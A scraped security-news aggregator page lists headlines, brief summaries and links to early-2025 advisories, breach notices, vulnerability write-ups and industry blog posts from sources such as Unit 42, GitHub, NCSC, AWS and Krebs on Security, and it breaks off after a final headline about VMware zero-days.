https://krebsonsecurity.com/2025/04/cyber-forensic-expert-in-2000-cases-faces-fbi-probe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Power of Identifying Continuously Vulnerable Repositories (CVRs)
Learn more about how Legit is helping enterprises prevent vulnerabilities in their SDLCs.
https://www.legitsecurity.com/blog/identifying-continuously-vulnerable-repositories
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 December 2024 Cyber Attacks Timeline
In the first timeline of December 2024, I collected 115 events (7.67 events/day) with a threat landscape dominated...
https://www.hackmageddon.com/2025/04/04/1-15-december-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OH-MY-DC: OIDC Misconfigurations in CI/CD
We found three key attack vectors in OpenID Connect (OIDC) implementation and usage. Bad actors could exploit these to access restricted resources.
The post OH-MY-DC: OIDC Misconfigurations in CI/CD appeared first on Unit 42.
https://unit42.paloaltonetworks.com/oidc-misconfigurations-in-ci-cd/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Localhost dangers: CORS and DNS rebinding
What is CORS and how can a CORS misconfiguration lead to security issues? In this blog post, we'll describe some common CORS issues as well as how you can find and fix them.
The post Localhost dangers: CORS and DNS rebinding appeared first on The GitHub Blog.
https://github.blog/security/application-security/localhost-dangers-cors-and-dns-rebinding/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The good, the bad and the unknown of AI: A Q&A with Mária Bieliková
The computer scientist and AI researcher shares her thoughts on the technology's potential and pitfalls – and what may lie ahead for us
https://www.welivesecurity.com/en/we-live-science/good-bad-unknown-ai-qa-maria-bielikova/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New guidance on securing HTTP-based APIs
Why it's essential to secure your APIs to build trust with your customers and partners.
https://www.ncsc.gov.uk/blog-post/new-guidance-on-securing-http-based-apis
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New online training helps board members to govern cyber risk
The NCSC's CEO, Richard Horne on the new cyber governance resources giving Boards the tools they need to govern cyber security risks.
https://www.ncsc.gov.uk/blog-post/new-online-training-helps-board-members-govern-cyber-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Open Source Malware Index Q1 2025: Data exfil threats rising sharply
Sonatype's ongoing mission is to equip organizations with the most up-to-date information on open source security threats. As part of that commitment, we will be sharing data and insights on a quarterly basis, diving into how the open source malware space is evolving, including diving into notable malicious packages.
https://www.sonatype.com/blog/open-source-malware-index-q1-2025
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lesley, What Happened to the “Cybersecurity Skills Shortage”?
Are you stressed out right now? I’m stressed out. Most Americans are, and cybersecurity job seekers are definitely not an exception. I do a ton of career mentoring and career clinics, and I see… the brunt of it. The last few mentoring Sundays I've done, I have had two or more people burst into tears. […]
https://tisiphone.net/2025/04/01/lesley-what-happened-to-the-cybersecurity-skills-shortage/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GitHub found 39M secret leaks in 2024. Here's what we're doing to help
Every minute, GitHub blocks several secrets with push protection—but secret leaks still remain one of the most common causes of security incidents. Learn how GitHub is making it easier to protect yourself from exposed secrets, including today's launches of standalone Secret Protection, org-wide scanning, and better access for teams of all sizes.
The post GitHub found 39M secret leaks in 2024. Here’s what we’re doing to help appeared first on The GitHub Blog.
https://github.blog/security/application-security/next-evolution-github-advanced-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon
Phishing with QR codes: New tactics described here include concealing links with redirects and using Cloudflare Turnstile to evade security crawlers.
The post Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon appeared first on Unit 42.
https://unit42.paloaltonetworks.com/qr-code-phishing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Protective DNS for the private sector
Advice on the selection and deployment of Protective Domain Name Systems (DNS).
https://www.ncsc.gov.uk/guidance/protective-dns-for-private-sector
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
I wannabe Red Team Operator
Red Team Operator. A hype-tagged role tag for which one question hits our corporate LinkedIn inbox very often. “Hey there, how can I become a Red Team Operator? Yours sincerely, a recent graduate.” To us, this is like asking how to become a regular starter on a Premier League football team. There's nothing wrong with […]
https://blog.compass-security.com/2025/04/i-wannabe-red-team-operator/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What's My Daily Life Like (in OT DFIR)?
One of the most common questions I get asked by aspiring (and current) cybersecurity professionals is what my odd niche of the universe in critical infrastructure incident response is really like, day to day. So let me give a brief overview of what my work life is like. The first thing one needs to understand […]
https://tisiphone.net/2025/03/31/whats-my-daily-life-like-in-ot-dfir/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ImageRunner: Privilege Escalation Vulnerability in GCP Cloud Run
An attacker with `run.services.update` and `iam.serviceAccounts.actAs` permissions but without
explicit registry access could deploy new revisions of Cloud Run services that pulled private
container images stored in the same GCP project. This was possible because Cloud Run uses a
service agent with the necessary registry read permissions to retrieve these images, regardless
of the caller's access level. By updating a service revision and injecting malicious commands
into the container's arguments (e.g., using Netcat for reverse shell access), attackers could
extract secrets or run unauthorized code. The flaw stemmed from the Cloud Run service agent's
trust model, which did not enforce a separate registry permission check on the deploying identity.
Google has since modified this behavior...
https://www.cloudvulndb.org/imagerunner
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ivanti Connect Secure Zero-Day Vulnerability
What are the Vulnerabilities?Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. CVE-2025-0282 is an unauthenticated stack-based buffer overflow affecting Ivanti Connect Secure, Policy Secure, and ZTA Gateways. Successful exploitation could result in unauthenticated remote code execution and CVE-2025-0283 is a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows a local authenticated attacker to escalate their privileges.According to a blog released by Mandiant, it has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. Ivanti Connect...
https://fortiguard.fortinet.com/threat-signal-report/5612
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.5.0 beta now available!
The ClamAV 1.5.0 beta is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. The beta phase is expected to last two to four weeks before we publish the stable release or else publish a release candidate. This will depend on how many changes are required to stabilize this version. Please take this time to evaluate ClamAV 1.5.0. Please help us validate this release by providing feedback via GitHub issues, via the ClamAV mailing list or on our Discord. IMPORTANT: A major feature of the 1.5 release is a FIPS-compliant method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. The feature is ready to test in this beta, but we are not yet distributing the...
http://blog.clamav.net/2025/03/clamav-150-beta-now-available.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber Security and Resilience Policy Statement to strengthen regulation of critical sectors
New proposals will combat the growing threat to UK critical national infrastructure (CNI).
https://www.ncsc.gov.uk/blog-post/cyber-security-resilience-bill-policy-statement
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with AWS SAM CLI (CVE-2025-3047, CVE-2025-3048)
Publication Date: 2025/03/31 08:10 AM PDT
Description
The AWS Serverless Application Model Command Line Interface (AWS SAM CLI) is an open-source CLI tool that helps Lambda developers to build and develop Lambda applications locally on their computers using Docker.
We have identified the following issues within the AWS SAM CLI. A fix has been released and we recommend users upgrade to the latest version to address these issues. Additionally, users should ensure any forked or derivative code is patched to incorporate the new fixes.
CVE-2025-3047: When running the AWS SAM CLI build process with Docker and symlinks are included in the build files, the container environment allows a user to access privileged files on the host by leveraging the elevated permissions granted to...
https://aws.amazon.com/security/security-bulletins/AWS-2025-008/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Using Sonatype Nexus Repository with the new Docker Hub rate limits
Beginning April 1, 2025, Docker is going to introduce new pull rate limits in Docker Hub, which follow previous limits introduced in 2020. In this blog, we will discuss how Sonatype Nexus Repository can help you navigate Docker Hub's upcoming pull rate limits.
https://www.sonatype.com/blog/using-sonatype-nexus-repository-with-the-new-docker-hub-rate-limits
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
This month in security with Tony Anscombe – March 2025 edition
From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news
https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-march-2025-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How Each Pillar of the 1st Amendment is Under Attack
In an address to Congress this month, President Trump claimed he had "brought free speech back to America." But barely two months into his second term, the president has waged an unprecedented attack on the First Amendment rights of journalists, students, universities, government workers, lawyers and judges.
This story explores a slew of recent actions by the Trump administration that threaten to undermine all five pillars of the First Amendment to the U.S. Constitution, which guarantees freedoms concerning speech, religion, the media, the right to assembly, and the right to petition the government and seek redress for wrongs.
https://krebsonsecurity.com/2025/03/how-each-pillar-of-the-1st-amendment-is-under-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
German Doner Kebab - 162,373 breached accounts
In March 2025, data allegedly sourced from German Doner Kebab was published on a popular hacking forum. The data included 162k unique email addresses alongside names, phone numbers and physical addresses. German Doner Kebab subsequently sent a disclosure notice to impacted individuals.
https://haveibeenpwned.com/PwnedWebsites#GermanDonerKebab
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Apache Tomcat RCE
What is the Vulnerability?On March 10, 2025, Apache issued a security advisory regarding a critical vulnerability (CVE-2025-24813) affecting the Apache Tomcat web server. This flaw could allow attackers to view or inject arbitrary content into security-sensitive files and potentially achieve remote code execution.Exploit code for this vulnerability is publicly available, and no authentication is required to launch an attack, making prompt mitigation essential. According to Apache, successful exploitation requires specific conditions, which may allow attackers to manipulate and view sensitive files or execute remote code.What is the recommended Mitigation?Impacted users should implement the recommended mitigations provided by Apache and follow the instructions outlined in the vendor's advisory:https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq-...
https://fortiguard.fortinet.com/threat-signal-report/6053
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2025 Advanced Persistent Bot Report: Scraper Bots Deep-Dive
How much do scraper bots affect your industry?
https://www.f5.com/labs/articles/threat-intelligence/2025-advanced-persistent-bot-report-scraper-bots-deep-dive
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Prevent Web Scraping by Applying the Pyramid of Pain
The Bots Pyramid of Pain: a framework for effective bot defense.
https://www.f5.com/labs/articles/threat-intelligence/prevent-web-scraping-by-applying-the-pyramid-of-pain
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How SBOMs drive a smarter SCA strategy
Modern software is largely assembled from open source components, constituting up to 90% of today's codebases. Managing the security and compliance risks associated with this external code is no longer optional — it's a core part of software development.
https://www.sonatype.com/blog/how-sboms-drive-a-smarter-sca-strategy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2025 Advanced Persistent Bots Report
Uncovering the true scale of persistent bot activity, and the advanced techniques that bot operators use in order to remain hidden from bot defenses.
https://www.f5.com/labs/articles/threat-intelligence/2025-advanced-persistent-bots-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The US Needs A New Cybersecurity Strategy: More Offensive Cyber Operations Isn't It
For a long time Chinese hackers have been operating in the grey area between espionage and warfare. The US has been struggling to defend its networks, but increasing offensive cyber operations in unlikely to help.
https://malwaretech.com/2025/03/the-us-needs-a-new-cybersecurity-strategy.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with tough, versions prior to 0.20.0 (Multiple CVEs)
Publication Date: 2025/03/27 02:30PM PDT
Description
The Update Framework (TUF) is a software framework designed to protect mechanisms that automatically identify and download updates to software. tough is a Rust client library for TUF repositories.
AWS is aware of the following issues within tough, versions prior to 0.20.0. On March 27, 2025, we released a fix in tough 0.20.0 and recommend customers upgrade to address these issues and ensure any forked or derivative code is patched to incorporate the new fixes.
CVE-2025-2885 relates to an issue with missing validation of the root metadata version number which could allow an actor to supply an unexpected version number to the client instead of the intended version in the root metadata file, altering the version fetched by...
https://aws.amazon.com/security/security-bulletins/AWS-2025-007/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New security requirements adopted by HTTPS certificate industry
Posted by Chrome Root Program, Chrome Security Team
The Chrome Root Program launched in 2022 as part of Google's ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying security assurances provided by Transport Layer Security (TLS). Many of these initiatives are described on our forward looking, public roadmap named “Moving Forward, Together.”
At a high-level, “Moving Forward, Together” is our vision of the future. It is non-normative and considered distinct from the requirements detailed in the Chrome Root Program Policy. It's focused on themes that we feel are essential...
http://security.googleblog.com/2025/03/new-security-requirements-adopted-by.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When Getting Phished Puts You in Mortal Danger
Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you your freedom or your life.
https://krebsonsecurity.com/2025/03/when-getting-phished-puts-you-in-mortal-danger/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Multiple crypto packages hijacked, turned into info-stealers
Sonatype has identified multiple npm cryptocurrency packages, latest versions of which have been hijacked and altered to steal sensitive information such as environment variables from the target victims.
https://www.sonatype.com/blog/multiple-crypto-packages-hijacked-turned-into-info-stealers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloud Threats on the Rise: Alert Trends Show Intensified Attacker Focus on IAM, Exfiltration
Understanding trends amidst noise: tracking shifts in security alerts allows cloud defenders to parse threats from attackers targeting IAM, storage and more.
The post Cloud Threats on the Rise: Alert Trends Show Intensified Attacker Focus on IAM, Exfiltration appeared first on Unit 42.
https://unit42.paloaltonetworks.com/2025-cloud-security-alert-trends/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Advance notice: End of Life for ClamAV 0.103 database updates
ClamAV version 0.103 will reach its end of life (EOL) for database updates on September 14, 2025. After this date, this version will no longer receive the latest virus definitions. To ensure your systems remain protected, please upgrade to the latest supported version of ClamAV before the end-of-life date. This will provide continued access to essential security updates and features. We recommend that users update to the newest release, ClamAV 1.4 LTS. For users that are unable to upgrade to version 1.4, you may find that ClamAV 1.0 LTS is more suitable. The most recent version of ClamAV can be found on the ClamAV Downloads page, on the ClamAV GitHub Releases page, and through Docker Hub. Information about how to install ClamAV is available in our online documentation. The...
http://blog.clamav.net/2025/03/advance-notice-end-of-life-for-clamav.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Legit Announces New Vulnerability Prevention Capabilities
Get details on Legit's new capabilities that allow AppSec teams to prevent introducing vulnerabilities.
https://www.legitsecurity.com/blog/legit-announces-new-vulnerability-prevention-capabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Blasting Past Webp
An analysis of the NSO BLASTPASS iMessage exploit
Posted by Ian Beer, Google Project Zero
On September 7, 2023 Apple issued an out-of-band security update for iOS:
Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild":
"[The target was] an individual employed by a Washington DC-based civil society organization with international offices...
The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim.
The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."
The day before,...
https://googleprojectzero.blogspot.com/2025/03/blasting-past-webp.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Titan Security Keys now available in more countries
Posted by Christiaan Brand, Group Product ManagerWe're excited to announce that starting today, Titan Security Keys are available for purchase in more than 10 new countries:IrelandPortugalThe NetherlandsDenmarkNorwaySwedenFinlandAustraliaNew ZealandSingaporePuerto RicoThis expansion means Titan Security Keys are now available in 22 markets, including previously announced countries like Austria, Belgium, Canada, France, Germany, Italy, Japan, Spain, Switzerland, the UK, and the US.What is a Titan Security Key?A Titan Security Key is a small, physical device that you can use to verify your identity when you sign in to your Google Account. It's like a second password that's much harder for cybercriminals to steal.Titan Security Keys allow you to store your passkeys on a strong, purpose-built...
http://security.googleblog.com/2025/03/titan-security-keys-now-available-in.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GitHub Actions Supply Chain Attack
What is the Attack?Recently, a popular third-party GitHub Action tj-actions/changed-files (CVE-2025-30066), used by over 23,000 repositories, was compromised, potentially exposing sensitive workflow secrets in any pipeline that integrated it.Subsequent investigation revealed that the compromise of tj-actions/changed-files may be linked to a similar breach of another GitHub Action, reviewdog/action-setup@v1 (CVE-2025-30154). Multiple Reviewdog actions were affected during a specific timeframe, raising further concerns about the scope of the attack. CVE-2025-30154 · GitHub Advisory DatabaseGitHub Actions, a widely used CI/CD platform, enables developers to automate software development pipelines with reusable workflow components. The supply chain compromise in this case poses a serious security...
https://fortiguard.fortinet.com/threat-signal-report/6052
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CodeQLEAKED - CodeQL Supply Chain Attack via Exposed Secret
A publicly exposed GitHub token in CodeQL workflow artifacts could allow attackers to execute malicious code
in repositories using CodeQL, potentially leading to source code exfiltration, secrets compromise, and supply
chain attacks. The vulnerability stemmed from a debug artifact containing environment variables, which could be
downloaded and exploited within a 1-2 second window.
https://www.cloudvulndb.org/codeql-supply-chain-attack-exposed-secret
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BlueSky InfoSec News List
Hello all, happy Tuesday. I’ve migrated my cybersecurity news feed list to BlueSky and it can now be found here: https://web-cdn.bsky.app/profile/hacks4pancakes.com/lists/3ll6ownhbuz2o I hope you find this useful. If you’re using Mastodon, the import process is a bit more manual: @Updated InfoSec Mastodon Lists!
https://tisiphone.net/2025/03/25/bluesky-infosec-news-list/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Troy Hunt's Mailchimp List - 16,627 breached accounts
In March 2025, a phishing attack successfully gained access to Troy Hunt's Mailchimp account and automatically exported a list of people who had subscribed to the newsletter for his personal blog. The exported list contained 16k email addresses and other data automatically collected by Mailchimp including IP address and a derived latitude, longitude and time zone.
https://haveibeenpwned.com/PwnedWebsites#TroyHuntMailchimpList
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issues with Kubernetes ingress-nginx controller (Multiple CVEs)
Publication Date: 2025/03/24 09:00AM PDT
Description
Ingress Controllers are applications within a Kubernetes cluster that enable Ingress resources to function.
AWS is aware of CVE-2025-1098, CVE-2025-1974, CVE-2025-1097, CVE-2025-24514, and CVE-2025-24513, which affect the Kubernetes ingress-nginx controller. Amazon Elastic Kubernetes Service (Amazon EKS) does not provide or install the ingress-nginx controller and is not affected by these issues. Customers who have installed this controller on their clusters should update to the latest version.
We have proactively notified customers who were identified as having this controller installed.
References:
CVE-2025-1098 - GitHub Issue
CVE-2025-1974 - GitHub Issue
CVE-2025-1097 - GitHub Issue
CVE-2025-24514 - GitHub Issue...
https://aws.amazon.com/security/security-bulletins/AWS-2025-006/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Next.js Vulnerability: What You Need to Know
Get details on this recent vulnerability, how to respond, and how Legit can help.
https://www.legitsecurity.com/blog/next-js-vulnerability-what-you-need-to-know
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A maintainer's guide to vulnerability disclosure: GitHub tools to make it simple
A step-by-step guide for open source maintainers on how to handle vulnerability reports confidently from the start.
The post A maintainer’s guide to vulnerability disclosure: GitHub tools to make it simple appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/a-maintainers-guide-to-vulnerability-disclosure-github-tools-to-make-it-simple/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CyberFirst Girls Competition: a proud milestone and exciting future
The future of the CyberFirst Girls Competition and reflecting on brilliant progress.
https://www.ncsc.gov.uk/blog-post/cyberfirst-girls-competition-milestone-future
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Privileged access workstations: introducing our new set of principles
Principles-based guidance for organisations setting up a PAW solution.
https://www.ncsc.gov.uk/blog-post/introducing-new-paws-principles
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Passkeys: they're not perfect but they're getting better
Passkeys are the future of authentication, offering enhanced security and convenience over passwords, but widespread adoption faces challenges that the NCSC is working to resolve.
https://www.ncsc.gov.uk/blog-post/passkeys-not-perfect-getting-better
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Passkeys: the promise of a simpler and safer alternative to passwords
The merits of choosing passkeys over passwords to help keep your online accounts more secure, and explaining how the technology promises to do this
https://www.ncsc.gov.uk/blog-post/passkeys-promise-simpler-alternative-passwords
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Arrests in Tap-to-Pay Scheme Powered by Phishing
Authorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets being used by the scammers were created through online phishing scams, and that the accused were relying on a custom Android app to relay tap-to-pay transactions from mobile devices located in China.
https://krebsonsecurity.com/2025/03/arrests-in-tap-to-pay-scheme-powered-by-phishing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Human Factor: Redefining Cybersecurity In The Age Of AI
https://www.proofpoint.com/us/newsroom/news/human-factor-redefining-cybersecurity-age-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with the AWS CDK CLI and custom credential plugins (CVE-2025-2598)
Publication Date: 2025/03/21 07:00 AM PDT
Description
AWS identified CVE-2025-2598, an issue in the AWS Cloud Development Kit (AWS CDK) Command Line Interface (AWS CDK CLI), versions 2.172.0 through 2.178.1. The AWS CDK CLI is a command line tool that deploys AWS CDK applications onto AWS accounts.
When customers run AWS CDK CLI commands with credential plugins and configure those plugins to return temporary credentials by including an expiration property, this issue can potentially result in the AWS credentials retrieved by the plugin to be printed to the console output. Any user with access to where the CDK CLI was ran would have access to this output. We have released a fix for this issue and recommend customers upgrade to version 2.178.2 or later to address this issue....
https://aws.amazon.com/security/security-bulletins/AWS-2025-005/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Analyzing the Global Increase in Vulnerability Scanning in 2024
BotPoke comes to the foreground yet again.
https://www.f5.com/labs/articles/threat-intelligence/analyzing-the-global-increase-in-vulnerability-scanning-in-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 4/2)
A compromise of the GitHub action tj-actions/changed-files highlights how attackers could exploit vulnerabilities in third-party actions to compromise supply chains.
The post GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 4/2) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Timelines for migration to post-quantum cryptography
Activities which organisations must carry out to migrate safely to post-quantum cryptography in the coming years.
https://www.ncsc.gov.uk/guidance/pqc-migration-timelines
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Setting direction for the UK's migration to post-quantum cryptography
Why the key milestones for PQC migration are part of building and maintaining good cyber security practice.
https://www.ncsc.gov.uk/blog-post/setting-direction-uk-migration-to-pqc
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing Web Filters Part 4: Host Header Spoofing & Domain Fronting Detection Bypasses
In the previous posts of this series, we looked at different ways to bypass web filters, such as Host header spoofing and domain fronting. As we’ve learned, these techniques can be detected by proxies employing TLS inspection, by checking whether the hostname in the SNI matches the one in the HTTP Host header. If they […]
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-4-host-header-spoofing-domain-fronting-detection-bypasses/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Yes, That's Me on Your Radio!
I had the honor of another short segment on NPR’s Marketplace this morning. I spoke about the state of cyber crime, and the impact of US government changes on cyber defense.
https://tisiphone.net/2025/03/19/yes-thats-me-on-your-radio/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SpyX - 1,977,011 breached accounts
In June 2024, spyware maker SpyX suffered a data breach that exposed almost 2M unique email addresses. The breach also exposed IP addresses, countries of residence, device information and 6-digit PINs in the password field. Further, a collection of iCloud credentials likely used to monitor targets directly via the cloud were also in the breach and contained the target's email address and plain text Apple password.
https://haveibeenpwned.com/PwnedWebsites#SpyX
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Updated InfoSec Mastodon Lists!
I have been asked for these, so here they are! I hope you find these useful in following more Fediverse cybersecurity stuff.
https://tisiphone.net/2025/03/18/updated-infosec-mastodon-lists/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lexipol - 672,546 breached accounts
In February 2025, the public safety policy management systems company Lexipol suffered a data breach. Attributed to the self-proclaimed "Puppygirl Hacker Polycule", the breach exposed an extensive number of documents and user records which were subsequently published publicly. The breach included over 670k unique email addresses in the user records, along with names, phone numbers, system-generated usernames and passwords stored as either MD5 or SHA-256 hashes.
https://haveibeenpwned.com/PwnedWebsites#Lexipol
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Github Actions tj-actions/changed-files Attack
Get details on this recent supply chain attack and how to prevent similar attacks in the future.
https://www.legitsecurity.com/blog/github-actions-tj-actions-changed-files-attack
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hundreds of Malicious Google Play-Hosted Apps Bypassed Android 13 Security With Ease
Bitdefender's security researchers have identified a large-scale ad fraud campaign that deployed hundreds of malicious apps in the Google Play Store, resulting in more than 60 million downloads total. The apps display out-of-context ads and even try to persuade victims to give away credentials and credit card information in phishing attacks.
The Google Play Store is often targeted by cybercriminals trying to upload malicious apps by bypassing existing protections. Google purges the store of suc
https://www.bitdefender.com/en-us/blog/labs/malicious-google-play-apps-bypassed-android-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing Web Filters Part 3: Domain Fronting
The last two blog posts in this series were about SNI spoofing and Host header spoofing. We also learned that the latter is addressed by some vendors with a technique called "Domain Fronting Detection". But what exactly is domain fronting? This will be explained in this blog post.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-3-domain-fronting/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Announcing OSV-Scanner V2: Vulnerability scanner and remediation tool for open source
Posted by Rex Pan and Xueqin Cui, Google Open Source Security TeamIn December 2022, we released the open source OSV-Scanner tool, and earlier this year, we open sourced OSV-SCALIBR. OSV-Scanner and OSV-SCALIBR, together with OSV.dev are components of an open platform for managing vulnerability metadata and enabling simple and accurate matching and remediation of known vulnerabilities. Our goal is to simplify and streamline vulnerability management for developers and security teams alike.Today, we're thrilled to announce the launch of OSV-Scanner V2.0.0, following the announcement of the beta version. This V2 release builds upon the foundation we laid with OSV-SCALIBR and adds significant new capabilities to OSV-Scanner, making it a comprehensive vulnerability scanner and remediation tool with...
http://security.googleblog.com/2025/03/announcing-osv-scanner-v2-vulnerability.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Off the Beaten Path: Recent Unusual Malware
Three unusual malware samples analyzed here include an ISS backdoor developed in a rare language, a bootkit and a Windows implant of a post-exploit framework.
The post Off the Beaten Path: Recent Unusual Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/unusual-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why Critical MongoDB Library Flaws Won't See Mass Exploitation
Discover how to mitigate CVE-2024-53900 and CVE-2025-23061, which expose Node.js APIs to remote attacks.
https://www.f5.com/labs/articles/threat-intelligence/why-critical-mongodb-library-flaws-wont-see-mass-exploitation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims
We identified a campaign spreading thousands of sca crypto investment platforms through websites and mobile apps, possibly through a standardized toolkit.
The post Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fraud-crypto-platforms-campaign/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing Web Filters Part 2: Host Header Spoofing
In the last post about bypassing web filters, I discussed how SNI spoofing works and how this can also be prevented by web filters. This post is about another bypass technique called Host Header spoofing.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-2-host-header-spoofing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sign in as anyone: Bypassing SAML SSO authentication with parser differentials
Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. In this blog post, we'll shed light on how these vulnerabilities that rely on a parser differential were uncovered.
The post Sign in as anyone: Bypassing SAML SSO authentication with parser differentials appeared first on The GitHub Blog.
https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing Web Filters Part 1: SNI Spoofing
This is the first part of a series of blog posts about techniques to bypass web filters, looking at increasingly advanced techniques with each part.
The first part is about how SNI spoofing can be used to bypass web filters.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-1-sni-spoofing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
VMware Multiple Products Zero-day Vulnerabilities
